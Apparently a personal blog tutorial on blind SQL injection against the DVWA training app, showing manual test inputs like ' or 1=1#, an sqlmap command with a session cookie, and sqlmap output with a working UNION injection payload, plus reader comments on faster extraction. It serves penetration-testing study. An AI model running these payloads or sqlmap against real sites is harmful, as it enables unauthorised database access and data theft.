Blind SQL injection
A web application that is vulnerable to SQL injection may display SQL error that looks like this:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 1. This error provide information that this web application is vulnerable to injection and the hacker knows that the DBMS is MySQL.
A web application that does not show the SQL error message when an injection was attempted is known as Blind SQL injection.
Reference: OWASP – Blind SQL injection.
Manual testing
A manual test is attempted by typing an incomplete syntax example putting a' and press submit. As can be seen, there’s no SQL syntax error displayed on the webapp, it is difficult to know if the webapp is susceptible to SQLi unless further test is done by using a complete query.
Testing with a valid query, like this ' or 1=1#, because 1=1 is always true the query displayed as below:
Automated injection example SQLmap
Use burpsuite to intercept the HTTP packet this is to find out what is the cookie, alternatively you can use tamper data to do it. After you have got the cookie value, you can use sqlmap to test for injection such as like this:
/pentest/database/sqlmap# ./sqlmap.py -u "http://172.16.0.4/dvwa/vulnerabilities/sqli_blind/?id=a&Submit=Submit" --cookie="security=low; PHPSESSID=ut8273jfu66ani571dssd1s6p0"
type anything in the box and click submit, burpsuite will have alert:
The results are these:
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://172.16.0.4/dvwa/vulnerabilities/sqli_blind/?id=a&Submit=Submit" --cookie="security=low; PHPSESSID=ut8273jfu66ani571dssd1s6p0"
sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 23:23:43
[23:23:44] [INFO] testing connection to the target url
[23:23:44] [INFO] testing if the url is stable, wait a few seconds
[23:23:45] [INFO] url is stable
[23:23:45] [INFO] testing if GET parameter 'id' is dynamic
[23:23:46] [WARNING] GET parameter 'id' appears to be not dynamic
[23:23:46] [WARNING] reflective value(s) found and filtering out
[23:23:46] [WARNING] heuristic test shows that GET parameter 'id' might not be injectable
[23:23:46] [INFO] testing for SQL injection on GET parameter 'id'
[23:23:46] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[23:23:46] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[23:23:46] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[23:23:47] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[23:23:47] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[23:23:47] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[23:23:47] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[23:23:47] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[23:23:47] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[23:23:47] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[23:23:48] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[23:23:48] [INFO] testing 'Oracle AND time-based blind'
[23:23:48] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[23:23:49] [INFO] target url appears to be UNION injectable with 2 columns
[23:23:49] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 10 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection points with a total of 120 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: UNION query
Title: MySQL UNION query (NULL) - 2 columns
Payload: id=a' LIMIT 1,1 UNION ALL SELECT NULL, CONCAT(0x3a686b633a,0x61484d4c475865765959,0x3a757a643a)#&Submit=Submit
---
[23:23:55] [INFO] testing MySQL
[23:23:55] [INFO] confirming MySQL
[23:23:55] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian or Ubuntu 6.0 (squeeze)
web application technology: PHP 5.3.3, Apache 2.2.16
back-end DBMS: MySQL >= 5.0.0
[23:23:55] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/172.16.0.4'
[*] shutting down at 23:23:55
root@bt:/pentest/database/sqlmap#
cyruslab 
Good post 😉
There are much faster ways of extracting data via blind injection, as it stands with MySQL DBs you should be able to extract one character in about 7 requests per character—if you are extracting chars in [a-zA-Z] you should be able to extract them in only 6 requests per char—
For more check out my blog post on blind MySQL injection —> http://k3170makan.blogspot.com/2012/01/bit-shifting-blind-injection-simplified.html
Hi K3170Makan! Thanks for visiting! I have read your article about bit shifting…but I do not not quite get it…I browse your blog a bit and found you have extensive post about google dorking which is sooo useful and interesting…:D I would like to add your blog to my blogroll 😀